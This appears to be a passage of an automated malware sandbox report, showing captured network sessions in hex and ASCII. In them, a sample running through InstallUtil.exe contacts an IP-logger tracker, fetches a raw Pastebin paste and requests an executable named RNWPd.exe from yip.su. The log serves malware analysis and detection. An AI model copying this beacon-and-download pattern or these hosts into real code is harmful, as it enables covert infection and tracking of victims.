                                                2024-08-09 21:01:24 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                                                Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                                                2024-08-09 21:01:24 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                                                Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                                                2024-08-09 21:01:24 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.649735172.67.188.1784434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:29 UTC68OUTGET /1djqU4 HTTP/1.1
                                                Host: iplogger.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:29 UTC1285INHTTP/1.1 403 Forbidden
                                                Date: Fri, 09 Aug 2024 21:01:29 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                Cross-Origin-Embedder-Policy: require-corp
                                                Cross-Origin-Opener-Policy: same-origin
                                                Cross-Origin-Resource-Policy: same-origin
                                                Origin-Agent-Cluster: ?1
                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                Referrer-Policy: same-origin
                                                X-Content-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                cf-mitigated: challenge
                                                2024-08-09 21:01:29 UTC685INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 31 6f 4d 73 58 73 48 65 2b 59 78 7a 4e 32 46 64 69 4a 6b 59 50 42 30 62 45 69 51 34 39 55 4c 77 4d 62 63 63 67 57 69 6a 37 53 52 49 5a 34 33 35 39 53 4a 6a 51 39 76 69 31 58 35 74 2b 32 69 61 41 71 70 44 78 43 7a 5a 62 30 63 2b 68 79 47 56 6e 42 50 41 6b 76 6e 58 6a 50 71 6a 52 61 64 6a 42 4b 2f 62 76 68 63 62 4b 4e 59 3d 24 30 4e 79 6d 31 42 69 31 77 4f 34 47 4d 65 73 53 49 64 5a 75 49 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                Data Ascii: cf-chl-out: 1oMsXsHe+YxzN2FdiJkYPB0bEiQ49ULwMbccgWij7SRIZ4359SJjQ9vi1X5t+2iaAqpDxCzZb0c+hyGVnBPAkvnXjPqjRadjBK/bvhcbKNY=$0Nym1Bi1wO4GMesSIdZuIQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                2024-08-09 21:01:29 UTC1369INData Raw: 33 63 32 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                Data Ascii: 3c28<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                2024-08-09 21:01:29 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                                Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                                2024-08-09 21:01:29 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                                2024-08-09 21:01:29 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                                Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                                2024-08-09 21:01:29 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                                Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                                2024-08-09 21:01:29 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                                Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                                2024-08-09 21:01:29 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                                Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                                2024-08-09 21:01:29 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 69 70 6c 6f 67 67 65 72 2e 63 6f 6d 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 37 39 30 33 32 27 2c 63 52 61 79 3a 20 27 38 62 30 61 61 65 38 31 33 39 63 38 30 66 37 38 27 2c 63 48 61 73 68 3a 20 27 65 39 33 34 34 30 63 65 32 33 63 35 63 30 61 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 31 64 6a 71 55 34 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 63 31 6d 33 4e 31 59 7a 6e 53 4a 33 43 58 68 6a 44 59 77 38 5a 30 4f 46 43 74 75 56 79 32 41 4d 44 75 36 54 49 5a 6d 52 64 57 41 2d 31 37 32 33 32 33 37 32 38 39 2d 30 2e 30 2e 31 2e 31 2d 33 36 36 38 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54
                                                Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "iplogger.com",cType: 'managed',cNounce: '79032',cRay: '8b0aae8139c80f78',cHash: 'e93440ce23c5c0a',cUPMDTk: "\/1djqU4?__cf_chl_tk=c1m3N1YznSJ3CXhjDYw8Z0OFCtuVy2AMDu6TIZmRdWA-1723237289-0.0.1.1-3668",cFPWv: 'g',cT
                                                2024-08-09 21:01:29 UTC1369INData Raw: 38 73 74 62 50 6d 51 39 54 2e 36 44 33 57 37 44 4c 53 39 71 64 63 59 62 58 58 52 76 62 73 64 70 43 7a 49 6e 32 4e 32 5f 56 65 4f 34 51 75 77 6a 44 77 79 45 72 69 43 64 45 30 64 65 32 36 53 59 7a 76 61 61 48 47 52 66 6a 43 6f 6d 41 74 52 73 77 55 34 6e 45 5f 4f 48 72 4a 66 5f 56 61 33 5f 42 30 57 53 6a 30 44 4e 35 43 66 59 46 5a 46 74 4f 48 66 72 49 4d 6c 67 65 4a 69 7a 49 41 6f 6a 4c 6c 61 54 38 46 72 74 59 70 67 4c 4c 55 74 73 43 5a 73 51 78 52 57 49 48 66 4a 42 5f 63 79 53 63 4e 32 6b 2e 77 6c 77 62 59 2e 44 35 75 65 70 4f 63 66 6b 31 48 70 78 46 35 6a 36 44 6a 4a 6d 76 46 47 65 2e 6b 6c 36 4a 7a 6a 7a 65 6c 6d 57 44 30 6c 79 6f 48 5a 63 6a 52 4a 4a 6f 78 59 46 49 47 39 78 77 69 44 55 45 56 31 77 30 2e 55 48 67 51 75 62 6f 6c 6a 39 45 47 4e 42 46 34 47
                                                Data Ascii: 8stbPmQ9T.6D3W7DLS9qdcYbXXRvbsdpCzIn2N2_VeO4QuwjDwyEriCdE0de26SYzvaaHGRfjComAtRswU4nE_OHrJf_Va3_B0WSj0DN5CfYFZFtOHfrIMlgeJizIAojLlaT8FrtYpgLLUtsCZsQxRWIHfJB_cyScN2k.wlwbY.D5uepOcfk1HpxF5j6DjJmvFGe.kl6JzjzelmWD0lyoHZcjRJJoxYFIG9xwiDUEV1w0.UHgQubolj9EGNBF4G


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.649737172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:30 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:30 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:30 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aae885dc043c3-EWR
                                                2024-08-09 21:01:30 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:01:30 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:01:30 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:01:30 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:01:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.649738188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:30 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:31 UTC898INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:31 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:30 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
